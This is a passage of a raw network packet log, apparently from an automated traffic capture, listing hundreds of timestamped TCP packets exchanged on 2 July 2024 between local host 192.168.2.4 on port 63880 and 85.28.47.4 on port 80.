                                            Jul 2, 2024 08:26:27.516705990 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.516717911 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.516731024 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.516731977 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.516741037 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.516743898 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.516758919 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.516781092 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.517208099 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.517388105 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.517436981 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.517530918 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.517544031 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.517554998 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.517565966 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.517579079 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.517580986 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.517591953 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.517604113 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.517605066 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.517620087 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.517622948 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.517630100 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.517640114 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.517643929 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.517654896 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.517689943 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.517699957 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.517699957 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.518482924 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.518495083 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.518507004 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.518518925 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.518528938 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.518537045 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.518543005 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.518553972 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.518562078 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.518565893 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.518578053 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.518579006 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.518589020 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.518591881 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.518603086 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.518618107 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.518646955 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.519439936 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.519452095 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.519463062 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.519474030 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.519484997 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.519496918 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.519496918 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.519505024 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.519509077 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.519520998 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.519534111 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.519534111 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.519546032 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.519556999 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.519558907 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.519575119 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.519591093 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.519610882 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.520245075 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.520256996 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.520267010 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.520278931 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.520288944 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.520301104 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.520307064 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.520318031 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.520320892 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.520330906 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.520342112 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.520344019 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.520351887 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.520355940 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.520366907 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.520378113 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.520390034 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.520395041 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.520395041 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.520410061 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.520440102 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.601464987 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.601485968 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.601499081 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.601528883 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.601567030 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.601614952 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.601624966 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.601635933 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.601648092 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.601660013 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.601663113 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.601681948 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.601701021 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.601977110 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.601994991 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.602005959 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.602037907 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.602066040 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.602142096 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.602183104 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.602268934 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.602281094 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.602298975 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.602313042 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.602324963 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.602336884 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.602340937 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.602340937 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.602360010 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.602368116 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.602757931 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.602775097 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.602787018 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.602797985 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.602808952 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.602808952 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.602814913 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.602821112 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.602833986 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.602844954 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.602847099 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.602854967 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.602865934 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.602875948 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.602878094 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.602884054 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.602889061 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.602916956 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.602926016 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.603605986 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.603617907 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.603635073 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.603646040 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.603656054 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.603672981 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.603677988 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.603678942 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.603689909 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.603701115 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.603705883 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.603712082 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.603713036 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.603739023 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.603749990 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.604399920 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.604412079 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.604429007 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.604439974 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.604449987 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.604451895 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.604460955 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.604471922 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.604479074 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.604486942 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.604497910 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.604505062 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.604511023 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.604521990 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.604525089 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.604532957 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.604548931 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.604573965 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.605433941 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.605446100 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.605457067 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.605468988 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.605479002 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.605489969 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.605490923 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.605500937 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.605513096 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.605515957 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.605519056 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.605530024 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.605540991 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.605545044 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.605555058 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.605566025 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.605568886 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.605581045 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.605612040 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.606302977 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.606314898 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.606324911 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.606337070 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.606348038 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.606355906 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.606359005 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.606369972 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.606372118 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.606381893 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.606385946 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.606393099 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.606404066 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.606415033 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.606415987 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.606426001 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.606432915 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.606446028 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.606463909 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.607255936 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.607268095 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.607278109 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.607289076 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.607299089 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.607301950 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.607310057 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.607321978 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.607326031 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.607337952 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.607342005 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.607350111 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.607357979 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.607361078 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.607372046 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.607378960 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.607382059 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.607388973 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.607403994 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.607429028 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.608206987 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.608217955 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.608227968 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.608246088 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.608251095 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.608257055 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.608268023 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.608268023 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.608278990 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.608289957 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.608294964 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.608300924 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.608310938 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.608314037 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.608321905 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.608328104 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.608330011 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.608336926 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.608351946 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.608369112 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.608393908 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.609055042 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.609069109 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.609081984 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.609092951 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.609103918 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.609106064 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.609114885 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.609124899 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.609127045 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.609147072 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.609169960 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.690330982 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.690378904 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.690391064 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.690423965 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.690444946 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.690536022 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.690551996 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.690565109 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.690574884 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.690577030 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.690602064 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.690625906 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.690793037 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.690804005 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.690815926 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.690828085 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.690844059 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.690869093 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.691025019 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.691037893 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.691050053 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.691072941 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.691087008 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.691098928 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.691101074 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.691109896 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.691121101 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.691121101 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.691132069 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.691144943 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.691169024 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.691684008 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.691696882 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.691708088 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.691718102 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.691729069 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.691737890 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.691740990 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.691744089 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.691752911 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.691762924 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.691767931 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.691778898 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.691791058 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.691792965 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.691814899 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.691839933 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.692454100 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.692467928 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.692480087 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.692502022 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.692502975 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.692512989 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.692514896 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.692526102 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.692532063 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.692537069 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.692548037 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.692548990 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.692558050 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.692559958 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.692570925 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.692583084 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.692594051 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.692599058 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.692599058 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.692605019 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.692615032 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.692641973 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.693430901 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.693445921 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.693455935 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.693468094 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.693478107 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.693483114 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.693490982 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.693502903 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.693502903 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.693514109 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.693517923 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.693526983 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.693537951 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.693547964 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.693550110 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.693559885 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.693568945 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.693569899 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.693584919 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.693608999 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.694365978 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.694379091 CEST806388085.28.47.4192.168.2.4
